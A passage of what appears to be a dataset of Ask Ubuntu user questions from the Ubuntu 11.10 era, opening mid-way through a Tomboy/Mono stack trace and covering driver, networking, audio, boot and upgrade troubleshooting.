mono.xml.dtdvalidatingreader.read ( ) [ 0x00000 ] in :0 at mono.xml.schema.xsdvalidatingreader.read ( ) [ 0x00000 ] in :0 at system.xml.xmlvalidatingreader.read ( ) [ 0x00000 ] in :0 at system.xml.xmldocument.readnodecore ( system.xml.xmlreader reader ) [ 0x00000 ] in :0 at system.xml.xmldocument.readnode ( system.xml.xmlreader reader ) [ 0x00000 ] in :0 at system.xml.xmldocument.load ( system.xml.xmlreader xmlreader ) [ 0x00000 ] in :0 at system.xml.xmldocument.load ( system.string filename ) [ 0x00000 ] in :0 at mono.addins.database.databaseconfiguration.read ( system.string file ) [ 0x00000 ] in :0 at mono.addins.database.addindatabase.get_configuration ( ) [ 0x00000 ] in :0 at mono.addins.database.addindatabase.runpendinguninstalls ( iprogressstatus monitor ) [ 0x00000 ] in :0 at mono.addins.database.addindatabase.update ( iprogressstatus monitor , system.string domain ) [ 0x00000 ] in :0 at mono.addins.addinregistry.update ( iprogressstatus monitor ) [ 0x00000 ] in :0 at tomboy.addinmanager.initializemonoaddins ( system.string old_conf_dir ) [ 0x00000 ] in :0 at tomboy.addinmanager..ctor ( system.string tomboy_conf_dir , system.string old_tomboy_conf_dir ) [ 0x00000 ] in :0 at tomboy.notemanager.initialize ( ) [ 0x00000 ] in :0 at tomboy.tomboy+c_anonstorey2. < > m_0 ( ) [ 0x00000 ] in :0 at glib.timeout+timeoutproxy.handler ( ) [ 0x00000 ] in :0 at glib.exceptionmanager.raiseunhandledexception ( system.exception e , boolean is_terminal ) at glib.timeout+timeoutproxy.handler ( ) at gtk.application.gtk_main ( ) at gtk.application.run ( ) at tomboy.gnomeapplication.startmainloop ( ) at tomboy.application.startmainloop ( ) at tomboy.tomboy.starttrayicon ( ) at tomboy.tomboy.main ( system.string [ ] args )
79468	icon for java is low resolution on launcher	on ubuntu oneiric , i am mildly annoyed by the icon that apparently java programs give themselves by default . it is too low a resolution . i have 'emblem ' set as the overlay icon for compiz 's scale and this seems to be an acceptable resolution for this context . however , the icon that is got by the launcher is different to the one that scale gets and is a lower resolution . the unity window switcher also gets an icon that it is too low a resolution . i have scoured all my directories for any .png with the letter 'j ' ( in the hope of finding 'java.png ' or 'jvm.png ' or something ) in it and replaced all appropriate ones with a high resolution alternative , which has red rays emanating from the mug in the icon ( the fænza—my current icon theme—variant ) . as you can see , the icons above still all have orange rays and are not the right resolution . i can not find any reference now to a .png file with 'j ' in it that looks like these icons . i would like to know where these icons are coming from and whether it is possible to replace them with higher resolution versions . all my other icons are pretty .
79469	firmware missing .ca n't connect to the internet ? please help	am using a macbook air ( late 2008 ) dual-booted mac osx and ubuntu 11.10 i cant connect to the internet as it says firmware missing i did the `` dmesg | grep -i firm '' command and this was the result : - [ 0.209432 ] [ firmware bug ] : acpi : bios _osi ( linux ) query ignored < br > [ 2.377469 ] broadcom 43xx driver loaded [ features : pnl , firmware-id : fw13 ] < br > [ 2.598274 ] b43-phy0 error : firmware file `` b43/n0initvals11.fw '' not found < br > [ 2.598278 ] b43-phy0 error : firmware file `` b43-open/ucode11.fw '' not found < br > [ 2.598282 ] b43-phy0 error : you must go to http : //wireless.kernel.org/en/users/drivers/b43 # devicefirmware and download the correct firmware for this driver version . please carefully read all instructions on this website . what to do ?
79473	gstreamer-based video player without many non-lxde dependencies ?	i want to use a gstreamer-based video player , preferably using a gtk frontend , on lxde . i 'm afraid totem could possibly bring in a lot of gnome dependencies , hence seeking alternatives .
79475	`` try ubuntu '' on grub menu is not displayed	i 've downloaded ubuntu 11.10 iso image . following the steps described on unbutu.com site i 've created a usb stick with the above image ( using startup disk creator from a ubuntu 11.04 pc ) rebooting the system i can see just `` install ubuntu '' as first item in the menu . i can not see `` try ubuntu '' option . ps : i 've also tried to follow `` install ubuntu '' but in the end the wizard for disk partition is displayed and it suggests to erase my `` master '' hd . any idea ?
79477	could i install ubuntu in virtual box using wubi ?	i am installing virtual box on windows and want to install ubuntu on this box using wubi ? or simply when i run the wubi installer , can i indicate that install on virtual box ? the problem is that i do n't have nero on my machine so i ca n't burn the ubuntu iso file on dvd or cd ( i am using windows 7 ) .
79481	is 100 % cpu usage harmful while update-apt-xapi runs ?	( system : 11.10 running unity 3d ) when update-apt-xapi is running , cpu usage stays at 100 % ( for about a couple of minutes ) . is that normal ? i understand that the command runs update-apt-xapian-index to update the index of software packages . my question is this : is such high cpu usage for a couple of minutes acceptable ? ( i have a dell inspiron 1545 laptop and the processor is `` intel® core™2 duo cpu t6400 @ 2.00ghz × 2 `` ) if it could be harmful , what precaution can a non-technically proficient user take ?
79487	how can dash remember its settings between sessions ?	i like when dash displays full screen and shows every item without clicking “show 1 more result” . but it looks impossible to set it so it 'll work like that after computer restart .
79488	after upgrade , the system does not start	i have installed ubuntu 10.10 in my system . my system consist of : pentium iii , / m.b . : cusl2 asus / 512 mb ram . when i upgraded online through terminal commands , it was upgraded to ubuntu 11.04 . on restarting the system just gives intimation warning as under : '' it seems that you do not have the hardware required to run unity . please choose ubuntu classic at the login screen and you will be using the traditional environment '' at this stage , the screen/system just hangs and doese n't proceed any further . how to get login screen and choose ubuntu classic ? could anybody guide me and help ?
79494	kernel panic after installing rt3060 driver	i 'm currently running ubuntu 11.10 64-bit on my desktop . i got ralink corp rt3060 ( rt3562sta ) wireless device . there was no proper support for this driver for ubuntu on their official site . so i have done some patches to install , which can be found here every hour , i get the following error panic mode occurred , switching back to text console . error screen : please help ! i 'm tired of restarting my machine !
79500	how to configure grub to show only splash-screen and error messages during boot and shutdown ?	i want to know where do i configure grub boot commands and commands called by lxsession-logout . i wish to make splash screen and only error output on both startup and shutdown/reboot . startup , as far as i know is somewhere in grub configs but shutdown is called by lxsession-logout and i do n't know where it resides .
79507	auto login not working unless keyboard is plugged in	i want to use ubuntu with unity ( 11.10 ) in a kiosk computer ( touchscreen all-in-one pc ) . i want to use touchscreen for all user input ( like atm ) . during installation i have created only one account and enabled auto login . it will only login automatically when the keyboard is connected please help
79525	no client internet access when setting up these iptables rules	i have read many other posts but can not figure this out . eth0 is my external connected to a comcast modem . the server has internet access with no issues . eth1 is internal and running dhcp for the clients . i have dhcp working just fine , all my clients can get an ip and ping the server but they can not access the internet . i am using isc-dhcp-server and have set /etc/default/isc-dhcp-server to interface= '' eht1 '' here is my dhcpd.conf file located in /etc/dhcp/dhcpd.conf ddns-update-style interim ; ignore client-updates ; subnet 10.0.10.0 netmask 255.255.255.0 { range 10.0.10.10 10.0.10.200 ; option routers 10.0.10.2 ; option subnet-mask 255.255.255.0 ; option domain-name-servers 208.67.222.222 , 208.67.220.220 ; # opendns # option domain-name `` example.com '' ; default-lease-time 21600 ; max-lease-time 43200 ; authoritative ; } i have made the *net.ipv4.ip_forward=1* change in /etc/sysctl.conf here is my interfaces file : auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp iface eth1 inet static address 10.0.10.2 netmask 255.255.255.0 network 10.0.10.0 auto eth1 and finally- here is my iptables.conf file : # firewall configuration written by system-config-firewall # manual customization of this file is not recommended . *nat : prerouting accept [ 0:0 ] : output accept [ 0:0 ] : postrouting accept [ 0:0 ] -a postrouting -s 10.0.10.0/24 -o eth0 -j masquerade # -a prerouting -i eth0 -p tcp -- dport 59668 -j dnat -- to-destination 10.0.10.2:59668 commit *filter : input accept [ 0:0 ] : forward accept [ 0:0 ] : output accept [ 0:0 ] -a input -m state -- state established , related -j accept -a input -p icmp -j accept -a input -i lo -j accept -a input -i eth1 -j accept -a input -m state -- state new -m tcp -p tcp -- dport 22 -j accept -a input -m state -- state new -m tcp -p tcp -- dport 80 -j accept -a input -m state -- state new -m tcp -p tcp -- dport 443 -j accept -a input -m state -- state new -m tcp -p tcp -- dport 53 -j accept -a input -m state -- state new -m udp -p udp -- dport 53 -j accept -a forward -s 10.0.10.0/24 -o eth0 -j accept -a forward -d 10.0.10.0/24 -m state -- state established , related -i eth0 -j accept -a forward -p icmp -j accept -a forward -i lo -j accept -a forward -i eth1 -j accept # -a forward -i eth0 -m state -- state new -m tcp -p tcp -d 10.0.10.2 -- dport 59668 -j accept -a input -j reject -- reject-with icmp-host-prohibited -a forward -j reject -- reject-with icmp-host-prohibited commit i am completely stuck . i can not figure out why the clients can not access the internet . am i missing a service ? is a service not running ? any help would be greatly appreciated . i tried to be as thorough as possible but please let me know if i have missed something . thank you !
79527	how do i make custom bootsplash and wallpapers	i would like to customize my ubuntu install with my own wallpaper . i know where to change the wallpapers i copy my wallpaper in /usr/share/wallpapers and then modify the contests/xml file in order to use it but thats about it . how can i also change the following with the same image : the login image ( lightdm ) boot screen and shutdown screen ( plymouth )
79532	how to run skype at boot time ?	i use ubuntu 11.10 and i have to start skype manually every time i log on . is there a way to run automatically run skype at boot time ? i prefer gui but console is ok too .
79533	how to change monitor 's frequency ?	the screen 's hurting my eyes ! 60hz is too low . how can i change it to 85hz ( my monitor is compatible with it ) ?
79536	unity 3d does not work on dell system with a amd radeon hd 6470m	i am running 64 bit ubuntu on dell with 1gb graphic card . i login with `` ubuntu '' hoping to see unity 3d but it does n't . unity 2d runs instead . when i type in echo `` $ desktop_session '' it confirms the unity-2d . i 've checked the system info that shows like : the graphics row shows itself as empty . so i 've presumed that the graphic drivers are n't detected and hence i went to unity- > additional drivers and installed the fglrx driver that the ui has suggested . even after installing so , the graphics part in system info details shows nothing and still unity 2d runs in spite of all the effort . please help ! how can i get my unity 3d back ? hardware info video card : amd radeonâ˘ hd 6470m - 1gb ( for icc ) ram : 6gb ( 1 x 2gb + 1 x 4gb ) 2 dimm ddr3 1333mhz os : 64 bit ubuntu 11.10 edit : output for /usr/lib/nux/unity_support_test -p x error of failed request : badrequest ( invalid request code or no such operation ) major opcode of failed request : 155 ( glx ) minor opcode of failed request : 19 ( x_glxqueryserverstring ) serial number of failed request : 21 current serial number in output stream : 21
79538	how to upgrade a remote server from 8.10 to newer version ?	i have a remote server still running ubuntu 8.10 9.04 that i can only access via ssh . if i run apt-get update i get a bunch of 404 errors on the packages . i 've asked a few questions on server fault but got nowhere . here 's what i 've done : run apt-get update which returns errors like : err http : //gb.archive.ubuntu.com intrepid/main packages 404 not found [ and same for many other packages ] run do-release-upgrade which returns : checking for a new ubuntu release failed upgrade tool signature failed upgrade tool done downloading extracting 'jaunty.tar.gz' failed to extract extracting the upgrade failed . there may be a problem with the network or with the server . edited /etc/update-manager/release-upgrades and changed from prompt=normal to prompt=lts ( as suggested here ) . running do-release-upgrade after this returns : checking for a new ubuntu release current dist not found in meta-release file no new release found ( updated ) i have followed the advice in this question and changed /etc/apt/sources.list to refer to jaunty instead of intrepid . however , that distro is not online anymore either . a comment there says i have to upgrade in chronological order ... so basically , it seems like i can not upgrade because my current distro is out of date and not supported . is there a way to upgrade direct to 10.x or 11.x ? note , as this is a server i only have command-line access . update 24/11 : i have managed to upgrade from 8.10 to 9.04 . ubuntu 's eol upgrades page provides some alternate urls for apt sources . i also needed to update /var/lib/update-manager/meta-release to point to the old-releases server too . however , now i can not upgrade from 9.04 to 9.10 . running do-release-upgrade produces the same error as # 2 above , except it `` failed to fetch '' ( the urls in meta-release are valid ) . the ubuntu jaunty upgrade page says it 's necessary to upgrade using a cd image . i followed the instructions here , but it did n't work : a fatal error occurred please report this as a bug and include the files /var/log/dist-upgrade/main.log and /var/log/dist-upgrade/apt.log in your report . the upgrade is now aborted . your original sources.list was saved in /etc/apt/sources.list.distupgrade . traceback ( most recent call last ) : file `` /tmp/tmp.jlhtwvuugb/karmic '' , line 7 , in sys.exit ( main ( ) ) file `` /tmp/tmp.jlhtwvuugb/distupgrademain.py '' , line 132 , in main if app.run ( ) : file `` /tmp/tmp.jlhtwvuugb/distupgradecontroller.py '' , line 1590 , in run return self.fullupgrade ( ) file `` /tmp/tmp.jlhtwvuugb/distupgradecontroller.py '' , line 1506 , in fullupgrade if not self.dopostinitialupdate ( ) : file `` /tmp/tmp.jlhtwvuugb/distupgradecontroller.py '' , line 762 , in dopostinitialupdate self.quirks.run ( `` postinitialupdate '' ) file `` /tmp/tmp.jlhtwvuugb/distupgradequirks.py '' , line 83 , in run for plugin in self.plugin_manager.get_plugins ( condition ) : file `` /tmp/tmp.jlhtwvuugb/computerjanitor/plugin.py '' , line 167 , in get_plugins filenames = self.get_plugin_files ( ) file `` /tmp/tmp.jlhtwvuugb/computerjanitor/plugin.py '' , line 120 , in get_plugin_files basenames = [ x for x in os.listdir ( dirname ) oserror : [ errno 2 ] no such file or directory : './plugins' it does say to report the bug , but since this is an old unsupported release i do n't know if it 's worth doing . however , is there a way round this , to upgrade from 9.04 to 9.10 ( and then finally to 10.04 lts . )
79545	how do i get 5.1 surround sound working on an acer aspire 5738zg witk three 3.5mm jacks ( front speakers , side speakers , subwoofer and center speaker ) ?	i got a problem with sound . i tried everything but no results . : ( i got 3 sound ports . my daemon : # this file is part of pulseaudio . # # pulseaudio is free software ; you can redistribute it and/or modify # it under the terms of the gnu lesser general public license as published by # the free software foundation ; either version 2 of the license , or # ( at your option ) any later version . # # pulseaudio is distributed in the hope that it will be useful , but # without any warranty ; without even the implied warranty of # merchantability or fitness for a particular purpose . see the gnu # general public license for more details . # # you should have received a copy of the gnu lesser general public license # along with pulseaudio ; if not , write to the free software # foundation , inc. , 59 temple place , suite 330 , boston , ma 02111-1307 # usa . # # configuration file for the pulseaudio daemon . see pulse-daemon.conf ( 5 ) for # # more information . default values are commented out . use either ; or # for # # commenting . ; daemonize = no ; fail = yes ; allow-module-loading = yes ; allow-exit = yes ; use-pid-file = yes ; system-instance = no ; local-server-type = user ; enable-shm = yes ; shm-size-bytes = 0 # setting this 0 will use the system-default , usually 64 mib ; lock-memory = no ; cpu-limit = no ; high-priority = yes ; nice-level = -11 ; realtime-scheduling = yes ; realtime-priority = 5 ; exit-idle-time = 20 ; scache-idle-time = 20 ; dl-search-path = ( depends on architecture ) ; load-default-script-file = yes ; default-script-file = /etc/pulse/default.pa ; log-target = auto ; log-level = notice ; log-meta = no ; log-time = no ; log-backtrace = 0 resample-method = speex-float-1 ; enable-remixing = yes ; enable-lfe-remixing = no flat-volumes = no ; rlimit-fsize = -1 ; rlimit-data = -1 ; rlimit-stack = -1 ; rlimit-core = -1 ; rlimit-as = -1 ; rlimit-rss = -1 ; rlimit-nproc = -1 ; rlimit-nofile = 256 ; rlimit-memlock = -1 ; rlimit-locks = -1 ; rlimit-sigpending = -1 ; rlimit-msgqueue = -1 ; rlimit-nice = 31 ; rlimit-rtprio = 9 ; rlimit-rttime = 1000000 ; default-sample-format = s16le ; default-sample-rate = 44100 ; default-sample-channels = 6 ; default-channel-map = front-left , front-right default-fragments = 8 default-fragment-size-msec = 10 ; enable-deferred-volume = yes ; deferred-volume-safety-margin-usec = 8000 ; deferred-volume-extra-delay-usec = 0
79546	why is the edit button greyed out in network manager ?	since 2 days ago i ca n't edit any connections using network manager , because the `` edit '' button is greyed out . i tried doing a normal restart of the service to no avail . any suggestions ?
79548	why does n't nautilus display the free space of a partition ?	this feature was a really nice thing and its really difficult to get to know the free space available in a partition . ca n't we get a tool-tip or something of that sort to display the free space . is there a way to get this feature back in ubuntu 11.10 .
79555	what is the smallest ( installed size ) ubuntu based distribution ?	for ridiculously small hard drives ( 8gb ) , what ubuntu based ( although not necessarily official ) distribution offers the smallest installed size ? let me clarify : i still want a certain amount of personal file space , preferably a few gig . i also do n't have a problem with performance , while it is mediocre , a 2.6ghz single-core and 1gb of ram suffice to run ubuntu fine , but i find that it uses 6-7gb of space . i am aiming for closer to 4gb .
79556	extracting zip file fails giving error need pk compat . v5.1	i have a password protected zip file which was created in windows . when i am trying to extract the same file under ubuntu i get the error need pk compat . v5.1 ( can do v4.6 ) . any idea how to proceed ?
79557	bind the windows key to lubuntu start menu	i am running lubuntu 11.10 . by default the main menu is bound to alt+f1 ( a-f1 ) which works . here is the relevant code from ~/.config/openbox/lubuntu-rc.xml < keybind key= '' a-f1 '' > < action name= '' execute '' > < command > lxpanelctl menu < /command > < /action > < /keybind > this works . when i hit alt+f1 , i can see the start menu . if i change the keys to `` windows key + m '' ( w-m ) , i can pull up the start menu using win+m < keybind key= '' w-m '' > < action name= '' execute '' > < command > lxpanelctl menu < /command > < /action > < /keybind > however , i can not bind the start menu to the windows key alone . if i try replacing `` w-m '' by `` w '' , the `` w '' alphabet key gets bound to the start menu . if i try `` w- '' nothing happens , i have tried the `` super '' option too but to no avail . how can i bind the lubuntu main menu to the windows key ? i have been through some relevant lubuntu questions , like this one , which tries to do the opposite . how do i unbind super key from menu in lubuntu
79565	add user to existing group	i want to add the apache user ( www-data ) to the audio group . i 've read the man page for useradd , but i 'm not having any luck . i 'm running xubuntu 11.10 . here 's what i 'm doing : $ sudo useradd -g audio www-data useradd : user 'www-data ' already exists if i leave out the -g option , bash , prints the help info for useradd : $ sudo useradd audio www-data usage : useradd [ options ] login options : -b , -- base-dir base_dir base directory for the home directory ... it 's not clear to me from the man page what options i should select to make this work .
79567	customize ubuntu server to load a minimal desktop only when needed	i would like to have an install with : ubuntu desktop with no additional applications or games graphical interface only when i manually run 'startx ' i am using ubuntu server and would like a gui , but do not want all of the additional desktop applications and games . ( i 'm using it with cli mode . )
79572	is there a note taking app that can synchronise across computers ?	i use tomboy notes and have been synching across computers using ubuntu one . however , the 11.10 `` upgrade '' has broken tomboy notes and ubuntu one synchronisation , numerous bugs are reported and it affects a large number of users . since tomboy notes will not be default in future releases i have my doubts this will ever be fixed , since bug fixing has adopted low priority compared to desktop environments . does anyone know of a good alternative that allows synchronisation in the cloud ?
79575	ca n't run gnome shell extensions - gtk-critical errors in gnome-tweak-tool	i have gnome shell 3.2.1 installed on ubuntu 11.10 , and i 'm trying to install extension on it . i downloaded via apt-get dock and alternative-status-menu , and ofcourse gnome-tweak-tool , but the extensions did n't appear in the tweak tool ( after relogin ) . so i followed the advice on this answer and changed the versions in the metadata files , and than the extensions appeared in the tweak tool - but the tweak tool was printing many errors , and the extensions were not working - i did n't get the extra shutdown options in the status menu , and i did n't get the dock . i did notice a problem of not being able to click the leftmost area of the scrollbar when the dock extension was activated - like the dock was stealing the mouse pointer from the other applications - but still , no dock . so , i found this answer and followed it to the letter , and it did get rid of the scheme parsing error , but i 'm still getting alot of gtk-critical errors when i run the tweak tool - i get 20 times the same error : ( gnome-tweak-tool:3158 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion 'width > = 0 ' failed also , now i ca n't enable the extensions in the tweak tool ( before i edited the files in gtweak i could set them to on - they just did n't work ) and i get an orange warning triangle next to them . so , does anyone know how to solve this ?
79583	adding custom applications to gnome launcher	looking for a utility that allows me insert an item into the list of applications that gnome knows about . for example : i have downloaded eclipse ee ( i have some very special plugins that i need to work with , and those plugins do n't `` like '' the version available in the default repository ) . i 'm using gnome 3 , on ubuntu 11.10 . so i want to execute eclipse w/o opening a terminal and running it . it must be something very simple .
79586	how do i find out what is planned for the next version ?	where can we find out what the expected changes for the next version of ubuntu are ?
79590	how to download packages for offline installation ?	i want to download packages for installation offline . ( example : sudo apt-get install ubuntu-desktop -- no-install-recommends . ) i am a student , so i dont want to download every time .
79592	firefox : open downloaded files with system default application	when i download a file with firefox , it always asks me with what program i want to open it with , even when that type of file is recognized by the system , and i can double click on it in nautilus and have it open properly . this is an example with a deb file , which opens with ubuntu software center ( as it should ) when i double click on it in nautilus . i do not want to look for the required program in /usr/bin or whatever in the firefox dialog , i want firefox to recognize my system preferences . what i resort to doing now is choose `` download '' , open nautilus and double click on the file ... why ca n't firefox recognize my system settings , and how do i get it to ? thanks !
79598	is it possible to get a mouse button ( not recognized by xev ) working ?	i am using microsoft explorer touch mouse and i am trying to get two buttons recognized . mouse , of course , comes with a custom software for windows and macosx to customize the buttons , but not for linux . unfortunately , xev just ignores those two button presses . is it possible at all to get them recognized ? if it is , where do i start ?
79599	remote desktop for ubuntu server requires installing the desktop distro ?	since i am new to ubuntu , and as the gui makes finding and installing applications a snap ( at least for me ) , i was checking if there 's a remote desktop feature for ubuntu server and i found out this ... [ 1 ] is the following true ? ubuntu desktop = ubuntu server + gui + pre-installed apps meant mostly for desktop use [ 2 ] if the above is true , ( a ) i can instead ask my web hosting provider to provide me with a dedicated server with ubuntu desktop version installed , right ? ( b ) will i be on the losing end by installing ubuntu desktop for a server ? i mean , will it use up much more ram for processes ? and will it be slower compared to ubuntu server - - i.e. , will the website/application hosted on it load slower etc ? [ 2 ] suppose that i 've a ubuntu server-installed dedicated server provided by a web hosting provider . and all i have is access to terminal , how do i enable remote desktop ? like this ? sudo aptitude install ubuntu-desktop what next ? how do i proceed with enabling remote desktop on the server ? and then how do i connect from my desktop ? i have only found gui-based how tos , and no credible terminal-based solutions . so , please do n't take this for a duplicate . [ 4 ] would enabling remote desktop as mentioned above cause any security issues , really ? [ 5 ] i was told that kde 's gui is faster and better performant when compared to gnome and unity . is that true ? ( which means , i should use this command for [ 3 ] : sudo aptitude install xubuntu-desktop -- or -- sudo aptitude install kubuntu-desktop ) extremely sorry if this is not the way ( putting a lot of questions into one - - i thought they 're related , so ... )
79604	has anyone gotten edimax 7811 to work under 11.10 ?	i recently upgraded to ubuntu 11.10 . afterwards i needed to have wireless capability on the same machine . the edimax 7811 is listed as linux compatible , but it did not work with ubuntu 11.10 . it uses the realtek 8192cu chip set . i was able to compile the driver that 's available on the realtek website , with help from various forums . the basic steps i followed included the following : sudo apt-get install build-essential linux-headers-generic downloaded the driver to desktop from : http : //www.edimax.com/en/support_det ... id=1 & pl2_id=44 cd desktop/rtl8192cu_8188cu_linux_v2.0.939.20100726/driver/rtl8192cu_linux_v2.0.939.20100726 make sudo make install sudo modprobe 8192cu i got a little ways into the make command before errors started appearing . evidently this works with 11.04 but the new 3.0 kernel has some differences in it that require some minor changes to the code . i found this : '' for kernels newer than maverick , every instance of init_mutex should be changed to sema_init . please amend os_dep/osdep_service.c with a text editor and change line 305 and any other instances and then try again : '' and this : change smp_lock.h to smp.h for all occurences . not sure about this one , because there are some special cases for kernel numbers greater than 2.6 i get to the make without problems , but make install returns : cp : can not stat '/autoconf_rtl8192c_usb_linux.h ' : no such file or directory i can connect to my router only , but not out to the internet .
79608	is it legal to distribute customized ubuntu ?	i have made my own version of ubuntu that i have customized using tools . i removed some application i did n't like , changed the login image to show my customized image , added the apps i like , changed other stuff etc . the only thing i kept is the sources.list - this still goes to ubuntu when i do the apt-get update & & apt-get safe-upgrade is it legal for me to distribute my version ? or should i keep it for myself ?
79613	why does unity become slow when switching between the menus ?	i have a big problem with unity in terms of speed ( i do n't remember having this sort of problems with gnome 2.x ) , my pc became slow when switching between the menus ( in the same application ) . using the global menu or the normal menu for applications that have n't been ported yet . i have a asus 1215n netbook . i think the problem comes from the theme because this does n't happens with gnome3 fallback or gnome-shell , but it happens with unity-2d . how can i solve this problem ?
79614	apache user ca n't play audio	i have a shell script 'vlc.sh ' that plays a video using vlc : # ! /bin/bash vlc /home/sparky/sample.mp4 when i run this script from my login , i get audio + video . when i call this script from the apache user ( via php ) , i get only video . the apache error log complains about audio : [ 0x96053ec ] pulse audio output error : can not connect to server : connection refused alsa lib confmisc.c:768 : ( parse_card ) can not find card '0' alsa lib conf.c:4184 : ( _snd_config_evaluate ) function snd_func_card_driver returned error : no such file or directory oss audio output error : can not open audio device ( /dev/dsp ) i 've tried adding the apache user to the audio , pulse , pulse-access , and admin groups . but i 've have had no luck . i 'm running xubuntu 11.10 . what should i try next ?
79617	why do apache2 upgrades remove and not re-install libapache2-mod-php5 ?	we repeatedly see that when an apache2 update arrives and is installed it causes the libapache2-mod-php5 package to be removed and does not subsequently re-install it automatically . we must subsequently re-install the libapache2-mod-php5 manually in order to restore functionality to our web server . please see the following github gist , it is a contiguous section of our server 's dpkg.log showing the november 14 , 2011 update to apache2 : https : //gist.github.com/1368361 it includes 2011-11-14 11:22:18 remove libapache2-mod-php5 5.3.2-1ubuntu4.10 5.3.2-1ubuntu4.10 is this a known issue ? do other people see this too ? i could not find any launchpad bug reports about it . platform details : $ lsb_release -ds ubuntu 10.04.3 lts $ uname -srvm linux 2.6.38-12-virtual # 51~lucid1-ubuntu smp thu sep 29 20:27:50 utc 2011 x86_64 $ dpkg -l | awk '/ii . *apache/ { print $ 2 `` `` $ 3 } ' apache2 2.2.14-5ubuntu8.7 apache2-mpm-prefork 2.2.14-5ubuntu8.7 apache2-utils 2.2.14-5ubuntu8.7 apache2.2-bin 2.2.14-5ubuntu8.7 apache2.2-common 2.2.14-5ubuntu8.7 libapache2-mod-authnz-external 3.2.4-2+squeeze1build0.10.04.1 libapache2-mod-php5 5.3.2-1ubuntu4.10 thanks at a high-level the update process looks like : package package_name do action : upgrade case node [ : platform ] when 'centos ' , 'redhat ' , 'scientific' options ' -- disableplugin=fastestmirror' when 'ubuntu' options '-o dpkg : :options : := '' -- force-confdef '' -o dpkg : :options : := '' -- force-confold '' ' end end but at a lower level def install_package ( name , version ) run_command_with_systems_locale ( : command = > `` apt-get -q -y # { expand_options ( @ new_resource.options ) } install # { name } = # { version } '' , : environment = > { `` debian_frontend '' = > `` noninteractive '' } ) end def upgrade_package ( name , version ) install_package ( name , version ) end so chef is using `` install '' to do `` update '' . this sort of moves the question around to `` how does apt-get safe-upgrade '' remember to re-install libapache-mod-php5 ? the exact sequence of packages that triggered this was : apache2 apache2-mpm-prefork apache2-mpm-worker apache2-utils apache2.2-bin apache2.2-common but the code is attempting to run checks to make sure the packages in that list are installed already before attempting to `` upgrade '' them . case node [ : platform ] when 'debian ' , 'centos ' , 'fedora ' , 'redhat ' , 'scientific ' , 'ubuntu' # first primitive way is to define the updates in the recipe # data bags will be used later % w/ apache2 apache2-mpm-prefork apache2-mpm-worker apache2-utils apache2.2-bin apache2.2-common /.each { |package_name| chef : :log.debug ( `` is # { package_name } among local packages available for changes ? '' ) next unless node [ : packages ] [ : changes ] .keys.include ? ( package_name ) chef : :log.debug ( `` is # { package_name } available for upgrade ? '' ) next unless node [ : packages ] [ : changes ] [ package_name ] [ : action ] == 'upgrade' package package_name do action : upgrade case node [ : platform ] when 'centos ' , 'redhat ' , 'scientific' options ' -- disableplugin=fastestmirror' when 'ubuntu' options '-o dpkg : :options : := '' -- force-confdef '' -o dpkg : :options : := '' -- force-confold '' ' end end tag ( 'upgraded ' ) } # after upgrading everything , run yum cache updater if tagged ? ( 'upgraded ' ) # remove old orphaned dependencies and kernel images and kernel headers etc . # remove cached deb files . case node [ : platform ] when 'ubuntu' execute 'apt-get -y autoremove' execute 'apt-get clean' # re-check what updates are available soon . when 'centos ' , 'fedora ' , 'redhat ' , 'scientific' node [ : packages ] [ : last_time_we_looked_at_yum ] = 0 end untag ( 'upgraded ' ) end end but it 's clear that it fails since the dpkg.log has 2011-11-14 11:22:25 install apache2-mpm-worker 2.2.14-5ubuntu8.7 on a system which does not currently have apache2-mpm-worker . i will have to discuss this with the author , thanks again .
79619	graphical bugs with gnome-shell/libreoffice and intel x3150	i am using ubuntu 11.10 on my asus 1215n with a intel x3150 and this is what happens when i use gnome-shell or libreoffice ( just some examples ) : gnome-shell glitch 1 http : //imageshack.us/photo/my-images/829/glitch1t.png/ gnome-shell glitch 2 http : //imageshack.us/photo/my-images/811/glitch2j.png/ libreoffice bug 1 http : //imageshack.us/photo/my-images/37/lib1.png/ libreoffice bug 2 http : //imageshack.us/photo/my-images/411/lib2.png/ the same happens with arch linux so i think it is a driver problem , so is there any workaround to solve this problem ?
79621	how do i switch audio sources on an hp pavilion dv7 ?	just switched from 11.04 to 11.10 and suddenly got the problem of audio switching . in previous versions i could 've switched from analog output to analog speakers on my hp pavilion dv7-3170el . now i can only use analog speakers 'cause this is the only option i 've got in sound items ' menu . what should i do to make switcher see my two mini-jack sound outputs ?
79622	is there any way to have the old `` appearance '' app from 10.10 back and use it with 11.10 ?	i loved how the appearance app was the go-to place for 80 % of everything pertaining to how your desktop looked . it had a built in theme installer , and had a visual way to see an example of how controls , window borders , and icons all would look before even selecting them . i know that right now is a transitional period with ubuntu/gnome communities . but i really hate how its very awkward to really change themes . with the old app , it basically was extremely self explanatory how themes worked and i was a very `` windows '' focused user that did n't much more than create folder , drag and drop , etc . and it may sound stupid , but the way the old app made it `` stupid simple '' to change themes and mix control themes with window themes , is what kept dragging me away from windows . cause i did n't know anything about the real freedom of linux , except that it let me make my desktop look how i wanted it to . now that 's gone , what is there to really pull the kind of new user that i used to be ? ? this is n't a huge things for me , as i 've learned how to install themes with the `` sudo ./install '' that most theme packages utilize . but i really think its a big issue for attracting new users . any light that can be shed on this would be very appreciated .
79623	can i run the same instance on two machines , without connecting from remote ?	just wondering if i can run the same ubuntu instance on two machines , without connecting from remote . i have 2 laptop with both the latest version , same programs but i can not remotely access to share or server outside the local network , one laptop always with me and a desktop . i do n't want to work from a remote session anyway , i 'd like work on different machines like as if were only one .
79624	multiple printer entries shown for hp officejet 4500 in cups system-config-printer 1.2.0	i upgraded from 8.04 to 10.04 in september . when i access system > administration > printing , i see multiple printers although i only have one connected i.e . i see : officejet_4500_g510a-f ( green check mark on left corner ) officejet_4500_g510a-f2 officejet_4500_g510a-fax officejet_4500_g510a-fax2 officejet_4500_g510a-fax3 pdf should i delete what seem to be duplicates e.g . the f2 , fax2 and fax3 ?
79625	how to delete files used by kernel ?	i have a very peculiar situation . i installed a piece of software by building it from source . i used `` make install '' from the folder that i downloaded it into ( on my desktop ) . later on , after not using it for a while , i decided i do n't need the folder on my desktop and shift-deleted it . most files in that folder were deleted , but some of them can not . it says i have no permissions to do it . what i am assuming is that those files are used by the kernel , because the software was built from source . is this correct , and if so , how can i delete them ? can i boot in another kernel or do something like windows 's safe mode ?
